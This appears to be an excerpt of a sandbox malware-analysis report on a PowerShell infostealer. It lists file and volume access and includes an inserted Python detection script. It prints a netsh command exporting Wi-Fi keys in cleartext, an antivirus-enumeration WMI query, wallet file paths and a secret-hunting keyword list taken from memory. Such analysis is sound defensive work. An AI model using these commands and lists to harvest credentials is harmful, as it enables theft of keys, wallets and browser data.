      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1UGQN2WC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\9IIU65Z0 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\MMOLQHS0 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\W5GO0CYE VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RoamingState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\SystemAppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApiGroup VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\202914 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280811 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\353698 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000161 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\RoamingState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\INetCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\Temp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetHistory VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCookies VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetHistory VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetHistory VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\SystemAppData VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
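The two entries above are what a detection engineer keys on: netsh.exe exporting Wi-Fi profiles with key=clear (the only form of that command that writes the pre-shared key in plaintext) and a WMI query against root\SecurityCenter2 for AntiVirusProduct, both spawned from powershell.exe. The following Python is an added example, not code from the report or from the sample: it classifies constructed process-creation and WMI-query records using the command line and WQL text shown above. The Event record shape, the finding names and the SCRIPT_HOSTS list are assumptions made for this example.

```python
"""Detection logic for the two behaviours listed above: netsh.exe exporting
Wi-Fi profiles with key=clear (plaintext PSKs) and a WMI query against
root\\SecurityCenter2 for AntiVirusProduct. Added example, not code from the
report or the sample; the event records below are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# netsh ... wlan ... export ... profile ... key=clear, other arguments in any position
NETSH_WIFI_EXPORT = re.compile(
    r"\bnetsh(?:\.exe)?\b.*\bwlan\b.*\bexport\b.*\bprofile\b.*\bkey\s*=\s*clear\b",
    re.IGNORECASE,
)
# root\SecurityCenter or root\SecurityCenter2 ... FROM AntiVirusProduct
AV_ENUM_WMI = re.compile(
    r"root\\SecurityCenter2?\b.*\bFROM\s+AntiVirusProduct\b", re.IGNORECASE
)
# Parents that make either behaviour far more suspicious than an admin typing it (assumed list)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Event:
    kind: str    # "process" for a process-creation record, "wmi" for a WMI query record
    parent: str  # image name of the process that created the child / issued the query
    detail: str  # command line ("process") or namespace plus WQL ("wmi")


def classify(ev: Event) -> Optional[str]:
    """Map one event to a finding name, or None if it is not of interest."""
    scripted = "_scripted" if ev.parent.lower() in SCRIPT_HOSTS else ""
    if ev.kind == "process" and NETSH_WIFI_EXPORT.search(ev.detail):
        return "wifi_profile_export_cleartext" + scripted
    if ev.kind == "wmi" and AV_ENUM_WMI.search(ev.detail):
        return "av_enum_securitycenter2" + scripted
    return None


# Constructed records; index 0 and 1 mirror the two report lines above.
SAMPLE_EVENTS = [
    Event("process", "powershell.exe",
          r'"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear'),
    Event("wmi", "powershell.exe",
          r"IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct"),
    Event("process", "explorer.exe", r"netsh.exe wlan show profiles"),
    Event("process", "cmd.exe", r'netsh wlan export profile name="Corp" folder=C:\backup'),  # no key=clear
    Event("wmi", "svchost.exe", r"root\cimv2 : SELECT * FROM Win32_Process"),
    Event("process", "mmc.exe", r"netsh wlan export profile folder=D:\profiles key=clear"),
]


def run(events: List[Event] = SAMPLE_EVENTS) -> List[Tuple[int, str]]:
    """Return (index, finding) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        finding = classify(ev)
        if finding:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for i, finding in run():
        print(f"event {i}: {finding}")
```

An export without key=clear is deliberately not flagged: the resulting XML then carries the key in its protected form, which is the normal administrative case. The parent process is the other discriminator; the report shows powershell.exe as the parent, and the suffix _scripted separates that from an administrator exporting profiles from an MMC or interactive shell.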

      Stealing of Sensitive Information

Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "Electrum" = Join-Path $env:appdata "\Electrum\wallets"
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "com.liberty.jaxx" = Join-Path $env:appdata "\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "Exodus" = Join-Path $env:appdata "\Exodus\exodus.wallet"
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
Source: powershell.exe, 00000019.00000002.2548122352.00000236B31E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 2fa|account|auth|backup|bank|binance|bitcoin|bitwarden|btc|casino|code|coinbase |crypto|dashlane|discord|eth|exodus|facebook|funds|info|keepass|keys|kraken|kucoin|lastpass|ledger|login|mail|memo|metamask|mnemonic|nordpass|note|pass|passphrase|paypal|pgp|private|pw|recovery|remote|roboform|secret|seedphrase|server|skrill|smtp|solana|syncthing|tether|token|trading|trezor|venmo|vault|wallet
Source: powershell.exe, 0000000C.00000002.1369722777.00007FFAAC7F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
